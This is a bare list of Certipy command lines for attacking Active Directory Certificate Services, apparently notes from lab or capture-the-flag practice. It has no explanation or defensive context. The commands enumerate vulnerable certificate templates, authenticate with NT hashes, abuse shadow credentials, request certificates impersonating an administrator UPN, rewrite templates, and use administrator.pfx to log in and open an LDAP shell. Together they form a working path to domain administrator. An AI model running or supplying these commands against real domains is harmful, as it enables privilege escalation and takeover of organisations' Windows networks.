certipy find -u 'user' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -dc-ip 10.10.11.51
certipy find -u '[email protected]' -p <password> -dc-ip <DC_IP> -vulnerable -enabled
certipy find -u '[email protected]' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -dc-ip 10.10.11.51
certipy-ad shadow auto -u '[email protected]' -p "WqSZAF6CysDQbGb3" -account 'user_2' -dc-ip '10.10.11.51'
certipy-ad req -u user -target domain.local -upn [email protected] -ca sequel-DC01-CA -template template_name -hashes 3b181b914e7a9d5508ea1e20bc2b7fce:3b181b914e7a9d5508ea1e20bc2b7fce -key-size 4096 -dns 10.10.11.51 -dc-ip 10.10.11.51
certipy-ad req -u user -target domain.local -web -port 80 -subject 'DIstinguishedName' -sid 'SID -debug' -ca sequel-DC01-CA -template template_name -target-ip <ip_ca>
certipy template -username [email protected] -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -template templateName -save-old
certipy template -username [email protected] -p -dc-ip ip_dc -template templateName -save-old -configuration configuration.json
certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
certipy auth -pfx administrator.pfx -domain domain.local
certipy auth -pfx administrator.pfx -domain domain.local --ldap-shell
certipy find -u '[email protected]' -p 'Password123!' -dc-ip 10.129.205.199 -bloodhound